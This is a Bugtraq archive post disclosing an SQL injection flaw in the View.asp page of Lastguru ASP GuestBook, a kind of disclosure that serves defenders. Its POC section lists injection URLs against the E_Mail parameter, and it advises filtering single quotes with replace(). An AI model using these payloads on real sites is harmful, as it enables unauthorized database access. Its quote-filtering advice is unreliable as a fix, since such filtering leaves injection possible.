[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Lastguru ASP GuestBook 'View.asp' - SQL Injection Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Lastguru ASP GuestBook 'View.asp' - SQL Injection Vulnerability
From: demonalex@xxxxxxx
Date: Sun, 4 Mar 2012 05:21:36 GMT

Title: Lastguru ASP GuestBook 'View.asp' - SQL Injection Vulnerability

Product : Lastguru ASP GuestBook

Version : Free Version

Vendor: http://www.LastGuru.com

Class:  Input Validation Error  

CVE:
 
Remote:  Yes  

Local:  No  

Published:  2012-03-04

Updated:  

Impact : Medium (CVSSv2 Base : 7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P)

Bug Description :
Page 'View.asp' of Lastguru ASP GuestBook(Free Version) is vulnerable with SQL 
Injection Vulnerability.

POC:
#-------------------------------------------------------------
http://victim/View.asp?E_Mail=webmaster@xxxxxxxxxxxx' and 'a'='a
http://victim/View.asp?E_Mail=webmaster@xxxxxxxxxxxx' and 'a'='b
http://victim/View.asp?E_Mail=webmaster@xxxxxxxxxxxx' and 0<(select count(*) 
from [book]) and 'a'='a
etc...
#-------------------------------------------------------------

Advice:
Use 'replace()' for filtering single quote and other dangerous symbols.

Credits : This vulnerability was discovered by demonalex@xxxxxxx
mail: demonalex@xxxxxxx / ChaoYi.Huang@xxxxxxxxxxxxxxxx
Pentester/Researcher
Dark2S Security Team/PolyU.HK

Prev by Date: Security Implications of Predictable IPv6 Fragment Identification values (rev'ed IETF I-D)
Next by Date: [SECURITY] [DSA 2424-1] libxml-atom-perl security update
Previous by thread: Security Implications of Predictable IPv6 Fragment Identification values (rev'ed IETF I-D)
Next by thread: [SECURITY] [DSA 2424-1] libxml-atom-perl security update
Index(es):
- Date
- Thread